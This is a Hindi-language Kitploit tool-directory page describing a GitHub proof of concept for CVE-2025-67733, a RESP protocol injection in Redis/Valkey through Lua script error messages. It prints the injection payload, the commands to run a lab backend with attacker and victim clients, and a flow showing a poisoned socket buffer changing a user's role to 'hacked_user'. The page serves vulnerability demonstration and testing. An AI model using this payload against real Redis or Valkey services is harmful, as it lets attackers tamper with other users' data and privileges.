Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-67733 — Redis/Valkey RESP इंजेक्शन PoC (CVE-2025-67733) | Kitploit
उपकरण/GitHubGitHub/jylab/cve-2025-67733
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubjylab/cve-2025-67733

CVE-2025-67733

Redis/Valkey RESP इंजेक्शन PoC (CVE-2025-67733)

रिपॉजिटरी देखें
16 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

RESP प्रोटोकॉल इंजेक्शन पीओसी

Valkey/Redis में Lua स्क्रिप्ट त्रुटि संदेशों के माध्यम से RESP प्रोटोकॉल इंजेक्शन भेद्यता प्रदर्शित करने वाला प्रूफ-ऑफ-कॉन्सेप्ट।

फ़ाइलें

backend.py

Flask बैकएंड जो साझा Valkey कनेक्शन (कनेक्शन पूलिंग) के साथ एक वेब एप्लिकेशन का अनुकरण करता है।

एंडपॉइंट्स:

MethodEndpointDescription
POST/api/user/roleउपयोगकर्ता भूमिका सेट करें
GET/api/user/roleउपयोगकर्ता भूमिका प्राप्त करें
POST/api/processLua स्क्रिप्ट निष्पादित करें

उपयोग:

root@kitploit:~
python backend.py <Valkey host> <Valkey port> [password]

# Examples
python backend.py 127.0.0.1 6379
python backend.py 127.0.0.1 6379 mypassword

attacker_client.py

Lua स्क्रिप्ट त्रुटि संदेश के माध्यम से सॉकेट बफर में दुर्भावनापूर्ण RESP डेटा इंजेक्ट करता है।

पेलोड:

root@kitploit:~
error(redis.error_reply("INJECTED\r\n$11\r\nhacked_user"))

उपयोग:

root@kitploit:~
python attacker_client.py

victim_client.py

उपयोगकर्ता भूमिकाओं को सेट और प्राप्त करने वाला वैध क्लाइंट।

उपयोग:

root@kitploit:~
python victim_client.py set    # Set role to "normal_user"
python victim_client.py get    # Get current role

हमला प्रदर्शन

आवश्यक शर्तें

root@kitploit:~
pip install flask requests

चरण

टर्मिनल 1 - बैकएंड प्रारंभ करें:

root@kitploit:~
python backend.py 127.0.0.1 6379

टर्मिनल 2 - भूमिका सेट करें:

root@kitploit:~
python victim_client.py set
# Output: 'role':'normal_user' has been set.

python victim_client.py get
# Output: 'role':'normal_user'

टर्मिनल 3 - हमला:

root@kitploit:~
python attacker_client.py
# Output: Socket poisoning successful

टर्मिनल 2 - भूमिका प्राप्त करें (हमले के बाद):

root@kitploit:~
python victim_client.py get
# Output: 'role':'hacked_user'

हमला प्रवाह

root@kitploit:~
1. Victim sets role
   victim_client.py set --> backend --> Valkey
                                        SET user:user:role "normal_user"

2. Attacker injects payload
   attacker_client.py --> backend --> Valkey
                                      EVAL 'error(...)' 0

   Backend reads: "-ERR INJECTED\r\n"
   Buffer remains: "$11\r\nhacked_user"

3. Victim gets role
   victim_client.py get --> backend --> Valkey
                                        GET user:user:role

   Backend reads from buffer: "$11\r\nhacked_user"
   Victim receives: "hacked_user"
टूल डाउनलोड करें